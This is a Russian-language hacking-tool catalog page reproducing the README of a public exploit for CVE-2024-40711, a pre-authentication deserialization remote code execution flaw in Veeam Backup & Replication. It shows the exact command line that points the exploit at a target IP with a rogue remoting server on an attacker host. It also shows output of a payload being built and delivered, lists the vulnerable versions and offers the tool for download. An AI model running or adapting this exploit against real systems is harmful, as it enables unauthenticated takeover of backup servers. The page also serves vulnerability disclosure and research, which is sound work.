Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2024-40711 — Эксплойт до аутентификации для CVE-2024-40711 | Kitploit
Инструменты/GitHubGitHub/watchtowrlabs/cve-2024-40711
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеRed TeamingИнструмент Удаленного Доступа
GitHubwatchtowrlabs/cve-2024-40711

CVE-2024-40711

Эксплойт до аутентификации для CVE-2024-40711

Репозиторий
55181 год назадПроверено Kitploit

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2024-40711

Эксплойт для Veeam backup and Replication: Pre-Auth Deserialization CVE-2024-40711

Технические детали см. в нашем посте в блоге

https://github.com/user-attachments/assets/24e8122c-3e84-408b-87a9-684a9aabeb70

PoC в действии

root@kitploit:~
CVE-2024-40711.exe -f binaryformatter -g Veeam -c http://192.168.201.1:8000/trigger --targetveeam 192.168.201.158



                 __         .__  ___________
__  _  _______ _/  |_  ____ |  |_\__    ___/_____  _  _________
\ \/ \/ /\__  \\   __\/ ___\|  |  \|    | /  _ \ \/ \/ /\_  __ \
 \     /  / __ \|  | \  \___|   Y  \    |(  <_> )     /  |  | \/
  \/\_/  (____  /__|  \___  >___|  /____| \____/ \/\_/   |__|
              \/          \/     \/


        (*) Veeam Backup & Replication Unauthenticated Remote Code Execution Exploit (CVE-2024-40711)
          - Vulnerability Discovered by Florian Hauser (@frycos) at CODE WHITE Gmbh (@codewhitesec)
          - Exploit Written by Sina Kheirkhah (@SinSinology) at watchTowr
          - Thank you to my dear friend Soroush Dalili (@irsdl) for his help

        CVEs: [CVE-2024-40711]

(*) Creating payload for 'cmd /c mspaint.exe'
(*) Wrapping payload in the CDbCryptoKeyInfo custom gadget
(*) Sending Remoting Trigger
(*) Started Rogue Server
HttpServerChannel for 'trigger' created:
  http://192.168.201.1:8000/trigger

Press any key to exit ...
[*] Processing message for '/trigger' from 192.168.201.158:50592 ... sending payload!

Florian Hauser

Эта уязвимость была обнаружена Florian Hauser (@frycos) из CODE WHITE GmbH (@codewhitesec). Обязательно следите за его выдающимися исследованиями; наша роль заключалась лишь в воссоздании и разработке эксплойта для этой проблемы.

Затронутые версии

ВерсияСтатус
12.2.0.334Полностью пропатчен. Не затронут уязвимостями, описанными в этой статье.
12.1.2.172Затронут, но для эксплуатации требуется аутентификация. Пользователи с низкими привилегиями могут выполнять произвольный код.
12.1.1.56 и более ранниеПодвержен RCE без аутентификации.

Авторы эксплойта

Этот эксплойт был написан Sina Kheirkhah (@SinSinology) из watchTowr (@watchtowrcyber)

Мы также хотели бы воспользоваться возможностью, чтобы поблагодарить Soroush Dalili за его помощь с этим эксплойтом.

Следите за watchTowr Labs

Чтобы быть в курсе последних исследований в области безопасности, следите за командой watchTowr Labs

  • https://labs.watchtowr.com/
  • https://twitter.com/watchtowrcyber
  • https://labs.watchtowr.com/veeam-backup-response-rce-with-auth-but-mostly-without-auth-cve-2024-40711-2/
  • https://github.com/codewhitesec/RogueRemotingServer
  • https://github.com/tyranid/ExploitRemotingService
  • https://www.veeam.com/kb4649
Скачать инструмент